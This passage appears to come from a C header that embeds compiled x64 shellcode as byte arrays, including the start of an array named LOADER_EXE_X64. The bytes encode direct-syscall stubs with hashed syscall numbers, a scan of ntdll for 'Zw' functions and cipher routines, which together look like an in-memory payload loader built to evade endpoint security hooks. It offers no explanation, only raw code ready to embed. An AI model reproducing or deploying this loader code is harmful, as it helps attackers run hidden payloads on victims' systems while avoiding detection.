2243 0x24, 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89,
2244 0x45, 0x88, 0xc7, 0x45, 0xe0, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45,
2245 0x20, 0x48, 0x83, 0xc0, 0x04, 0x48, 0x89, 0x45, 0x80, 0x8b, 0x45, 0xe4,
2246 0x83, 0xe8, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00,
2247 0x00, 0x48, 0x8b, 0x45, 0x90, 0x48, 0x01, 0xd0, 0x8b, 0x00, 0x89, 0xc2,
2248 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x48, 0x89, 0x85, 0x78, 0xff,
2249 0xff, 0xff, 0x48, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x0f, 0xb7, 0x00,
2250 0x66, 0x3d, 0x5a, 0x77, 0x75, 0x70, 0x8b, 0x45, 0xe0, 0x48, 0x8d, 0x14,
2251 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x8d, 0x1c,
2252 0x02, 0x48, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x48, 0x89, 0xc1, 0xe8,
2253 0xac, 0xfd, 0xff, 0xff, 0x89, 0x03, 0x8b, 0x45, 0xe4, 0x83, 0xe8, 0x01,
2254 0x89, 0xc0, 0x48, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x45, 0x88, 0x48, 0x01,
2255 0xd0, 0x0f, 0xb7, 0x00, 0x0f, 0xb7, 0xc0, 0x48, 0x8d, 0x14, 0x85, 0x00,
2256 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x98, 0x48, 0x01, 0xd0, 0x8b, 0x55,
2257 0xe0, 0x48, 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55,
2258 0x80, 0x48, 0x01, 0xca, 0x8b, 0x00, 0x89, 0x42, 0x04, 0x83, 0x45, 0xe0,
2259 0x01, 0x81, 0x7d, 0xe0, 0xf4, 0x01, 0x00, 0x00, 0x74, 0x10, 0x83, 0x6d,
2260 0xe4, 0x01, 0x83, 0x7d, 0xe4, 0x00, 0x0f, 0x85, 0x49, 0xff, 0xff, 0xff,
2261 0xeb, 0x01, 0x90, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x55, 0xe0, 0x89, 0x10,
2262 0xc7, 0x45, 0xdc, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x30, 0x01, 0x00, 0x00,
2263 0xc7, 0x45, 0xd8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x0b, 0x01, 0x00, 0x00,
2264 0x8b, 0x45, 0xd8, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48,
2265 0x8b, 0x45, 0x80, 0x48, 0x01, 0xd0, 0x8b, 0x50, 0x04, 0x8b, 0x45, 0xd8,
2266 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x0c, 0xc5, 0x00, 0x00, 0x00,
2267 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xc8, 0x8b, 0x40, 0x04, 0x39,
2268 0xc2, 0x0f, 0x86, 0xd0, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x48, 0x8d,
2269 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01,
2270 0xd0, 0x8b, 0x00, 0x89, 0x85, 0x60, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xd8,
2271 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80,
2272 0x48, 0x01, 0xd0, 0x8b, 0x40, 0x04, 0x89, 0x85, 0x64, 0xff, 0xff, 0xff,
2273 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0xc5,
2274 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xd0, 0x8b,
2275 0x55, 0xd8, 0x48, 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
2276 0x55, 0x80, 0x48, 0x01, 0xca, 0x8b, 0x00, 0x89, 0x02, 0x8b, 0x45, 0xd8,
2277 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00,
2278 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xd0, 0x8b, 0x55, 0xd8, 0x48,
2279 0x8d, 0x0c, 0xd5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x55, 0x80, 0x48,
2280 0x01, 0xca, 0x8b, 0x40, 0x04, 0x89, 0x42, 0x04, 0x8b, 0x45, 0xd8, 0x83,
2281 0xc0, 0x01, 0x89, 0xc0, 0x48, 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00,
2282 0x48, 0x8b, 0x45, 0x80, 0x48, 0x01, 0xc2, 0x8b, 0x85, 0x60, 0xff, 0xff,
2283 0xff, 0x89, 0x02, 0x8b, 0x45, 0xd8, 0x83, 0xc0, 0x01, 0x89, 0xc0, 0x48,
2284 0x8d, 0x14, 0xc5, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x80, 0x48,
2285 0x01, 0xc2, 0x8b, 0x85, 0x64, 0xff, 0xff, 0xff, 0x89, 0x42, 0x04, 0x83,
2286 0x45, 0xd8, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x00, 0x2b, 0x45, 0xdc,
2287 0x83, 0xe8, 0x01, 0x39, 0x45, 0xd8, 0x0f, 0x82, 0xe0, 0xfe, 0xff, 0xff,
2288 0x83, 0x45, 0xdc, 0x01, 0x48, 0x8b, 0x45, 0x20, 0x8b, 0x00, 0x83, 0xe8,
2289 0x01, 0x39, 0x45, 0xdc, 0x0f, 0x82, 0xbe, 0xfe, 0xff, 0xff, 0xb8, 0x01,
2290 0x00, 0x00, 0x00, 0x48, 0x81, 0xc4, 0xc8, 0x00, 0x00, 0x00, 0x5b, 0x5d,
2291 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x89, 0x4d, 0x10,
2292 0x48, 0x89, 0x55, 0x18, 0x48, 0x83, 0x7d, 0x18, 0x00, 0x75, 0x07, 0xb8,
2293 0xff, 0xff, 0xff, 0xff, 0xeb, 0x49, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89,
2294 0xc1, 0xe8, 0x1c, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x75, 0x07, 0xb8, 0xff,
2295 0xff, 0xff, 0xff, 0xeb, 0x32, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00,
2296 0xeb, 0x19, 0x48, 0x8b, 0x45, 0x18, 0x8b, 0x55, 0xfc, 0x8b, 0x44, 0xd0,
2297 0x04, 0x39, 0x45, 0x10, 0x75, 0x05, 0x8b, 0x45, 0xfc, 0xeb, 0x14, 0x83,
2298 0x45, 0xfc, 0x01, 0x48, 0x8b, 0x45, 0x18, 0x8b, 0x00, 0x39, 0x45, 0xfc,
2299 0x72, 0xdc, 0xb8, 0xff, 0xff, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x30, 0x5d,
2300 0xc3, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x27, 0x6e, 0x95, 0x32,
2301 0x48, 0x8b, 0x54, 0x24, 0x60, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x7b, 0xff,
2302 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59,
2303 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41,
2304 0x50, 0x41, 0x51, 0xb9, 0x0d, 0x22, 0x5e, 0x03, 0x48, 0x8b, 0x54, 0x24,
2305 0x78, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x4f, 0xff, 0xff, 0xff, 0x48, 0x83,
2306 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2307 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2308 0x42, 0xb8, 0xce, 0x9a, 0x4c, 0x89, 0xc2, 0x48, 0x83, 0xec, 0x28, 0xe8,
2309 0x25, 0xff, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2310 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51,
2311 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x53, 0x91, 0x98, 0xf2, 0x4c, 0x89,
2312 0xc2, 0x48, 0x83, 0xec, 0x28, 0xe8, 0xfb, 0xfe, 0xff, 0xff, 0x48, 0x83,
2313 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2314 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2315 0xd1, 0xd6, 0x9d, 0x34, 0x48, 0x89, 0xd2, 0x48, 0x83, 0xec, 0x28, 0xe8,
2316 0xd1, 0xfe, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2317 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51,
2318 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x23, 0xe1, 0xbd, 0xe3, 0x4c, 0x89,
2319 0xca, 0x48, 0x83, 0xec, 0x28, 0xe8, 0xa7, 0xfe, 0xff, 0xff, 0x48, 0x83,
2320 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2321 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2322 0x17, 0x15, 0x91, 0x0b, 0x48, 0x8b, 0x54, 0x24, 0x50, 0x48, 0x83, 0xec,
2323 0x28, 0xe8, 0x7b, 0xfe, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59,
2324 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f,
2325 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x15, 0x42, 0xb7, 0x1c,
2326 0x4c, 0x89, 0xc2, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x51, 0xfe, 0xff, 0xff,
2327 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89,
2328 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41,
2329 0x51, 0xb9, 0x4b, 0x47, 0xa5, 0x31, 0x48, 0x8b, 0x54, 0x24, 0x58, 0x48,
2330 0x83, 0xec, 0x28, 0xe8, 0x25, 0xfe, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28,
2331 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3,
2332 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0xef, 0x7f,
2333 0x90, 0x87, 0x48, 0x8b, 0x54, 0x24, 0x48, 0x48, 0x83, 0xec, 0x28, 0xe8,
2334 0xf9, 0xfd, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2335 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51,
2336 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9, 0x2a, 0xfe, 0x9d, 0x24, 0x48, 0x8b,
2337 0x94, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83, 0xec, 0x28, 0xe8, 0xca,
2338 0xfd, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a,
2339 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52,
2340 0x41, 0x50, 0x41, 0x51, 0xb9, 0x39, 0x2b, 0xcf, 0x55, 0x48, 0x8b, 0x54,
2341 0x24, 0x58, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x9e, 0xfd, 0xff, 0xff, 0x48,
2342 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca,
2343 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51,
2344 0xb9, 0x93, 0x76, 0x29, 0x34, 0x48, 0x8b, 0x94, 0x24, 0x80, 0x00, 0x00,
2345 0x00, 0x48, 0x83, 0xec, 0x28, 0xe8, 0x6f, 0xfd, 0xff, 0xff, 0x48, 0x83,
2346 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58, 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f,
2347 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x51, 0x52, 0x41, 0x50, 0x41, 0x51, 0xb9,
2348 0xf7, 0xc9, 0xac, 0xff, 0x4c, 0x89, 0xca, 0x48, 0x83, 0xec, 0x28, 0xe8,
2349 0x45, 0xfd, 0xff, 0xff, 0x48, 0x83, 0xc4, 0x28, 0x41, 0x59, 0x41, 0x58,
2350 0x5a, 0x59, 0x49, 0x89, 0xca, 0x0f, 0x05, 0xc3, 0x90, 0x0f, 0x0b, 0x90,
2351 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2352 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
2353 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xd8, 0xc7, 0x45, 0xfc, 0x00,
2354 0x00, 0x00, 0x00, 0xeb, 0x1f, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85,
2355 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x01, 0xd0, 0x8b,
2356 0x10, 0x8b, 0x45, 0xfc, 0x89, 0x54, 0x85, 0xe0, 0x83, 0x45, 0xfc, 0x01,
2357 0x83, 0x7d, 0xfc, 0x03, 0x76, 0xdb, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00,
2358 0x00, 0xeb, 0x5e, 0x8b, 0x45, 0xd8, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b,
2359 0x45, 0xdc, 0x01, 0xc2, 0x8b, 0x45, 0xe0, 0x31, 0xd0, 0x89, 0x45, 0xd8,
2360 0x8b, 0x45, 0xdc, 0xc1, 0xc0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0xd8, 0x31,
2361 0xd0, 0x89, 0x45, 0xdc, 0x8b, 0x45, 0xec, 0x89, 0x45, 0xf8, 0x8b, 0x45,
2362 0xe4, 0xc1, 0xc8, 0x08, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x01, 0xd0, 0x33,
2363 0x45, 0xfc, 0x89, 0x45, 0xec, 0x8b, 0x45, 0xe0, 0xc1, 0xc0, 0x03, 0x89,
2364 0xc2, 0x8b, 0x45, 0xec, 0x31, 0xd0, 0x89, 0x45, 0xe0, 0x8b, 0x45, 0xe8,
2365 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xf8, 0x89, 0x45, 0xe8, 0x83, 0x45, 0xfc,
2366 0x01, 0x83, 0x7d, 0xfc, 0x1a, 0x76, 0x9c, 0x48, 0x8b, 0x45, 0xd8, 0x48,
2367 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
2368 0x50, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45,
2369 0x10, 0x48, 0x89, 0x45, 0xe0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45,
2370 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00,
2371 0x00, 0x00, 0x00, 0xc7, 0x45, 0xec, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xc9,
2372 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01,
2373 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x06, 0x83, 0x7d, 0xf4, 0x40,
2374 0x75, 0x73, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x2b, 0x45, 0xf0, 0x89, 0xc2,
2375 0x48, 0x8d, 0x4d, 0xd0, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xc8, 0x41, 0x89,
2376 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x5e, 0xf5,
2377 0xff, 0xff, 0x8b, 0x45, 0xf0, 0xc6, 0x44, 0x05, 0xd0, 0x80, 0x83, 0x7d,
2378 0xf0, 0x0b, 0x76, 0x2b, 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x8d, 0x45, 0xd0,
2379 0x48, 0x89, 0xc1, 0xe8, 0xb0, 0xfe, 0xff, 0xff, 0x48, 0x31, 0x45, 0xf8,
2380 0x48, 0x8d, 0x45, 0xd0, 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0xba, 0x00,
2381 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x25, 0xf5, 0xff, 0xff, 0x8b,
2382 0x45, 0xf4, 0xc1, 0xe0, 0x03, 0x89, 0x45, 0xdc, 0xc7, 0x45, 0xf0, 0x10,
2383 0x00, 0x00, 0x00, 0x83, 0x45, 0xec, 0x01, 0xeb, 0x1e, 0x8b, 0x55, 0xf4,
2384 0x48, 0x8b, 0x45, 0xe0, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x89, 0xc2,
2385 0x8b, 0x45, 0xf0, 0x88, 0x54, 0x05, 0xd0, 0x83, 0x45, 0xf0, 0x01, 0x83,
2386 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf0, 0x10, 0x75, 0x1b, 0x48, 0x8b, 0x55,
2387 0xf8, 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc1, 0xe8, 0x4b, 0xfe, 0xff,
2388 0xff, 0x48, 0x31, 0x45, 0xf8, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
2389 0x83, 0x7d, 0xec, 0x00, 0x0f, 0x84, 0x2d, 0xff, 0xff, 0xff, 0x48, 0x8b,
2390 0x45, 0xf8, 0x48, 0x83, 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90,
2391 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x55, 0x48, 0x89, 0xe5,
2392 0x48, 0x83, 0xec, 0x20, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18,
2393 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x45, 0x10,
2394 0x48, 0x89, 0x45, 0xe8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xeb,
2395 0x42, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00,
2396 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x08, 0x8b, 0x45, 0xfc,
2397 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xe8,
2398 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, 0x4c, 0x8d, 0x04, 0x85,
2399 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x4c, 0x01, 0xc0, 0x31,
2400 0xca, 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc, 0x03, 0x76,
2401 0xb8, 0xc7, 0x45, 0xfc, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x1c, 0x01, 0x00,
2402 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2403 0x83, 0xc0, 0x04, 0x8b, 0x00, 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89,
2404 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x8b, 0x00, 0xc1,
2405 0xc0, 0x05, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x10, 0x48, 0x8b,
2406 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x04, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b,
2407 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x48, 0x8b, 0x45, 0xf0,
2408 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2409 0xc0, 0x08, 0x01, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2410 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0, 0x08, 0x89, 0xc1, 0x48, 0x8b, 0x45,
2411 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2412 0x83, 0xc0, 0x0c, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48,
2413 0x83, 0xc0, 0x08, 0x8b, 0x08, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
2414 0x04, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08, 0x01,
2415 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x8b, 0x00, 0xc1, 0xc0, 0x10,
2416 0x89, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00,
2417 0x01, 0xc2, 0x48, 0x8b, 0x45, 0xf0, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0,
2418 0x48, 0x83, 0xc0, 0x0c, 0x8b, 0x00, 0xc1, 0xc0, 0x0d, 0x89, 0xc1, 0x48,
2419 0x8b, 0x45, 0xf0, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
2420 0x0c, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0,
2421 0x04, 0x8b, 0x00, 0xc1, 0xc0, 0x07, 0x89, 0xc1, 0x48, 0x8b, 0x45, 0xf0,
2422 0x48, 0x83, 0xc0, 0x08, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2423 0xc0, 0x04, 0x31, 0xca, 0x89, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83,
2424 0xc0, 0x08, 0x8b, 0x10, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x83, 0xc0, 0x08,
2425 0xc1, 0xc2, 0x10, 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d, 0xfc,
2426 0x0f, 0x0f, 0x86, 0xda, 0xfe, 0xff, 0xff, 0xc7, 0x45, 0xfc, 0x00, 0x00,
2427 0x00, 0x00, 0xeb, 0x42, 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00,
2428 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x48, 0x01, 0xd0, 0x8b, 0x08,
2429 0x8b, 0x45, 0xfc, 0x48, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48,
2430 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0xfc, 0x4c,
2431 0x8d, 0x04, 0x85, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf0, 0x4c,
2432 0x01, 0xc0, 0x31, 0xca, 0x89, 0x10, 0x83, 0x45, 0xfc, 0x01, 0x83, 0x7d,
2433 0xfc, 0x03, 0x76, 0xb8, 0x90, 0x90, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3,
2434 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x50, 0x48, 0x89, 0x4d, 0x10,
2435 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x44, 0x89, 0x4d, 0x28,
2436 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0x18,
2437 0x48, 0x89, 0x45, 0xe8, 0xe9, 0xc1, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4,
2438 0x00, 0x00, 0x00, 0x00, 0xeb, 0x18, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45,
2439 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x8b, 0x45, 0xf4, 0x88, 0x54,
2440 0x05, 0xd0, 0x83, 0x45, 0xf4, 0x01, 0x83, 0x7d, 0xf4, 0x0f, 0x76, 0xe2,
2441 0x48, 0x8d, 0x45, 0xd0, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x4d, 0x10, 0xe8,
2442 0xa0, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0x28, 0xba, 0x10, 0x00, 0x00, 0x00,
2443 0x39, 0xd0, 0x0f, 0x47, 0xc2, 0x89, 0x45, 0xe4, 0xc7, 0x45, 0xf4, 0x00,
2444 0x00, 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x55, 0xf4, 0x48, 0x8b, 0x45, 0xf8,
2445 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x08, 0x8b, 0x45, 0xf4, 0x0f, 0xb6, 0x54,
2446 0x05, 0xd0, 0x44, 0x8b, 0x45, 0xf4, 0x48, 0x8b, 0x45, 0xf8, 0x4c, 0x01,
2447 0xc0, 0x31, 0xca, 0x88, 0x10, 0x83, 0x45, 0xf4, 0x01, 0x8b, 0x45, 0xf4,
2448 0x3b, 0x45, 0xe4, 0x72, 0xd0, 0x8b, 0x45, 0xe4, 0x29, 0x45, 0x28, 0x8b,
2449 0x45, 0xe4, 0x48, 0x01, 0x45, 0xf8, 0xc7, 0x45, 0xf4, 0x10, 0x00, 0x00,
2450 0x00, 0xeb, 0x24, 0x8b, 0x45, 0xf4, 0x83, 0xe8, 0x01, 0x89, 0xc2, 0x48,
2451 0x8b, 0x45, 0xe8, 0x48, 0x01, 0xd0, 0x0f, 0xb6, 0x10, 0x83, 0xc2, 0x01,
2452 0x88, 0x10, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x02, 0xeb, 0x0b, 0x83,
2453 0x6d, 0xf4, 0x01, 0x8b, 0x45, 0xf4, 0x85, 0xc0, 0x7f, 0xd5, 0x83, 0x7d,
2454 0x28, 0x00, 0x0f, 0x85, 0x35, 0xff, 0xff, 0xff, 0x90, 0x90, 0x48, 0x83,
2455 0xc4, 0x50, 0x5d, 0xc3, 0x90, 0x90, 0x90, 0x90, 0xff, 0xff, 0xff, 0xff,
2456 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
2457 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
2458 0x00, 0x00, 0x00, 0x00};
2459
0
1 unsigned char LOADER_EXE_X64[] = {
2 0x55, 0x48, 0x81, 0xec, 0x30, 0x05, 0x00, 0x00, 0x48, 0x8d, 0xac, 0x24,
3 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0xc0, 0x04, 0x00, 0x00, 0x48,
4 0xc7, 0x85, 0xa8, 0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b,
5 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x08, 0x02, 0x00, 0x00,
6 0x48, 0x85, 0xc0, 0x0f, 0x84, 0x51, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
7 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x40, 0x70, 0x48, 0x89, 0x85, 0xa0,
8 0x04, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xc0, 0x04, 0x00, 0x00, 0x48, 0x8b,
9 0x50, 0x28, 0x48, 0x8b, 0x85, 0xa0, 0x04, 0x00, 0x00, 0x49, 0x89, 0xd0,
